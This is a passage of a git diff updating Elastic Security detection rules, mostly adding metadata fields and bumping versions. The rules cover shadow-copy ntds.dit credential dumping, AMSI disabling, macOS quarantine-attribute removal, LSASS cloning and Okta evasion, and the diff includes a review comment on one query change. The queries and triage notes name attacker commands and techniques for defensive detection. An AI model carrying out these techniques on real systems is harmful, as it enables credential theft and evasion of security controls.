a target as it contains password hashes, but an offline copy is\nneeded to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited\n to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "query": "process where event.type in (\"start\",\"process_created\") and\n process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\") and\n\n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n", "references": [ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink", "https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Kheirkhabarov_Hunting_for_Credentials_Dumping_in_Windows_Environment.pdf", 
"https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/", "https://www.hackingarticles.in/credential-dumping-ntds-dit/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0", + "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_systemkey_dumping.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_systemkey_dumping.json index c7659fab81750..dc4db164fdd6a 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_systemkey_dumping.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_systemkey_dumping.json
@@ -15,6 +15,23 @@
 "references": [
 "https://github.com/AlessandroZ/LaZagne/blob/master/Mac/lazagne/softwares/system/chainbreaker.py"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "d75991f2-b989-419d-b797-ac1e54ec2d61",
 "severity": "high",
@@ -51,5 +68,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 2
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_user_excessive_sso_logon_errors.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_user_excessive_sso_logon_errors.json
index 408a12cf85ce2..a03898f5a3656 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_user_excessive_sso_logon_errors.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_user_excessive_sso_logon_errors.json
@@ -15,10 +15,39 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "O365 Excessive Single Sign-On Logon Errors",
- "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:o365.audit and event.provider:AzureActiveDirectory and event.category:authentication and o365.audit.LogonError:\"SsoArtifactInvalidOrExpired\"\n",
+ "related_integrations": [
+ {
+ "package": "o365",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "o365.audit.LogonError",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "2de10e77-c144-4e69-afb7-344e7127abd0",
+ "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -52,5 +81,5 @@
 "value": 5
 },
 "type": "threshold",
- "version": 4
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_user_impersonation_access.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_user_impersonation_access.json
index 7cd8ebcd77d31..409176331416e 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_user_impersonation_access.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_user_impersonation_access.json
@@ -12,13 +12,32 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Okta User Session Impersonation",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.action:user.session.impersonation.initiate\n",
 "references": [
 "https://blog.cloudflare.com/cloudflare-investigation-of-the-january-2022-okta-compromise/"
 ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "cdbebdc1-dc97-43c6-a538-f26a20c0a911",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -42,5 +61,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 1
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_via_snapshot_lsass_clone_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_via_snapshot_lsass_clone_creation.json
index 3680bcfd8c956..aed01f7918d3d 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_via_snapshot_lsass_clone_creation.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_via_snapshot_lsass_clone_creation.json
@@ -11,14 +11,32 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential LSASS Clone Creation via PssCaptureSnapShot",
- "note": "## Config\n\nThis is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.code:\"4688\" and\n process.executable : \"?:\\\\Windows\\\\System32\\\\lsass.exe\" and\n process.parent.executable : \"?:\\\\Windows\\\\System32\\\\lsass.exe\"\n",
 "references": [
 "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/",
 "https://medium.com/@Achilles8284/the-birth-of-a-process-part-2-97c6fb9c42a2"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.code",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.executable",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "a16612dd-b30e-4d41-86a0-ebe70974ec00",
+ "setup": "This is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -53,5 +71,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 2
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.json
index b1963b1b83666..01b0a70774f81 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.json
@@ -12,10 +12,28 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Adding Hidden File Attribute via Attrib",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"attrib.exe\" and process.args : \"+h\"\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "4630d948-40d4-4cef-ac69-4002e29bc3db",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -61,5 +79,5 @@
 "timeline_title": "Comprehensive Process Timeline",
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 13
+ "version": 15
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_agent_spoofing_mismatched_id.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_agent_spoofing_mismatched_id.json
index 88dfa27a313b3..ccea306c55715 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_agent_spoofing_mismatched_id.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_agent_spoofing_mismatched_id.json
@@ -16,6 +16,13 @@
 "license": "Elastic License v2",
 "name": "Agent Spoofing - Mismatched Agent ID",
 "query": "event.agent_id_status:agent_id_mismatch\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.agent_id_status",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "3115bd2c-0baa-4df0-80ea-45e474b5ef93",
 "severity": "high",
@@ -43,5 +50,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 3
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_agent_spoofing_multiple_hosts.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_agent_spoofing_multiple_hosts.json
index e74f382e2291f..54d221bcc6643 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_agent_spoofing_multiple_hosts.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_agent_spoofing_multiple_hosts.json
@@ -16,6 +16,13 @@
 "license": "Elastic License v2",
 "name": "Agent Spoofing - Multiple Hosts Using Same Agent",
 "query": "event.agent_id_status:*\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.agent_id_status",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "493834ca-f861-414c-8602-150d5505b777",
 "severity": "high",
@@ -55,5 +62,5 @@
 },
 "timestamp_override": "event.ingested",
 "type": "threshold",
- "version": 2
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_amsienable_key_mod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_amsienable_key_mod.json
index f542cf2ca89f4..0e50d057040c1 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_amsienable_key_mod.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_amsienable_key_mod.json
@@ -12,14 +12,32 @@ "language": "eql", "license": "Elastic License v2", "name": "Modification of AmsiEnable Registry Key", - "note": "## Triage and analysis\n\n### Investigating Modification of AmsiEnable Registry Key\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and\nservices to integrate with any antimalware product that's present on a machine. AMSI provides integration with multiple\nWindows components, ranging from User Account Control (UAC) to VBA Macros.\n\nSince AMSI is widely used across security products for increased visibility, attackers can disable it to evade\ndetections that rely on it.\n\nThis rule monitors the modifications to the Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable registry key.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Retrieve scripts or Microsoft Office files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences on other hosts.\n\n### False positive analysis\n\n- This modification should not happen legitimately. 
Any potential benign true positive (B-TP) should be mapped and\nmonitored by the security team, as these modifications expose the host to malware infections.\n\n### Related rules\n\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Delete or set the key to its default value.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Modification of AmsiEnable Registry Key\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and\nservices to integrate with any antimalware 
product that's present on a machine. AMSI provides integration with multiple\nWindows components, ranging from User Account Control (UAC) to VBA Macros.\n\nSince AMSI is widely used across security products for increased visibility, attackers can disable it to evade\ndetections that rely on it.\n\nThis rule monitors the modifications to the Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable registry key.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Retrieve scripts or Microsoft Office files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences on other hosts.\n\n### False positive analysis\n\n- This modification should not happen legitimately. 
Any potential benign true positive (B-TP) should be mapped and\nmonitored by the security team, as these modifications expose the host to malware infections.\n\n### Related rules\n\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Delete or set the key to its default value.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "registry where event.type in (\"creation\", \"change\") and\n registry.path : (\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\"\n ) and\n registry.data.strings: (\"0\", \"0x00000000\")\n", "references": [ "https://hackinparis.com/data/slides/2019/talks/HIP2019-Dominic_Chell-Cracking_The_Perimeter_With_Sharpshooter.pdf", "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" ], + "required_fields": [ + 
{ + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "f874315d-5188-4b4a-8521-d1c73093a7e4", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -54,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_apple_softupdates_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_apple_softupdates_modification.json index f354f521d168e..eaa234f555d18 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_apple_softupdates_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_apple_softupdates_modification.json @@ -18,6 +18,28 @@ "references": [ "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f683dcdf-a018-4801-b066-193d4ae6c8e5", "severity": "medium", @@ -54,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_del_quarantine_attrib.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_del_quarantine_attrib.json
index b6e853b63dece..6e46811b60e59 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_del_quarantine_attrib.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_del_quarantine_attrib.json
@@ -11,14 +11,42 @@
"language": "eql",
"license": "Elastic License v2",
"name": "Attempt to Remove File Quarantine Attribute",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
- "query": "process where event.type in (\"start\", \"process_started\") and\n process.args : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\" and process.command_line :\n (\n \"/bin/bash -c xattr -c *\",\n \"/bin/zsh -c xattr -c *\",\n \"/bin/sh -c xattr -c *\"\n )\n )\n )\n",
+ "note": "",
+ "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count > 12\n",
"references": [
"https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html",
"https://ss64.com/osx/xattr.html"
],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args_count",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "process.command_line",
+ "type": "wildcard"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
"risk_score": 47,
"rule_id": "f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
"severity": "medium",
"tags": [
"Elastic",
@@ -53,5 +81,5 @@
],
"timestamp_override": "event.ingested",
"type": "eql",
- "version": 4
+ "version": 6
}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/attempt_to_deactivate_okta_network_zone.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_deactivate_okta_network_zone.json
similarity index 53%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/attempt_to_deactivate_okta_network_zone.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_deactivate_okta_network_zone.json
index 8c8353f1d5f9c..bec75106eb02a 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/attempt_to_deactivate_okta_network_zone.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_deactivate_okta_network_zone.json
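Review bot: The new `query` adds `not process.args_count > 12` and turns `(process.args : \"-c\")` into a standalone branch, whereas the removed query only accepted `-c` together with the `process.command_line` patterns; neither the threshold nor the wider `-c` branch is explained anywhere in the rule, because `note` is now `""` and `setup` carries only the `event.ingested` text. Recording the reason in `note` (false-positive suppression looks like the intent, but the hunk does not say) would let anyone tuning the rule see what the bound trades away, e.g. `The args_count bound limits matches to short xattr invocations; raise it if your environment legitimately runs longer xattr commands.` The hunk starts at `language` and the file's remaining keys are outside it, so this is inferred from the visible lines only.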
@@ -13,15 +13,34 @@
"language": "kuery",
"license": "Elastic License v2",
"name": "Attempt to Deactivate an Okta Network Zone",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
"query": "event.dataset:okta.system and event.action:zone.deactivate\n",
"references": [
"https://help.okta.com/en/prod/Content/Topics/Security/network/network-zones.htm",
"https://developer.okta.com/docs/reference/api/system-log/",
"https://developer.okta.com/docs/reference/api/event-types/"
],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
"risk_score": 47,
"rule_id": "8a5c1e5f-ad63-481e-b53a-ef959230f7f1",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
"severity": "medium",
"tags": [
"Elastic",
@@ -29,9 +48,34 @@
"Okta",
"Continuous Monitoring",
"SecOps",
- "Network Security"
+ "Network Security",
+ "Defense Evasion"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.007",
+ "name": "Disable or Modify Cloud Firewall",
+ "reference": "https://attack.mitre.org/techniques/T1562/007/"
+ }
+ ]
+ }
+ ]
+ }
],
"timestamp_override": "event.ingested",
"type": "query",
- "version": 4
+ "version": 6
}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/attempt_to_delete_okta_network_zone.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_delete_okta_network_zone.json
similarity index 52%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/attempt_to_delete_okta_network_zone.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_delete_okta_network_zone.json
index 903475b441d01..4349c59ac38fa 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/attempt_to_delete_okta_network_zone.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_attempt_to_delete_okta_network_zone.json
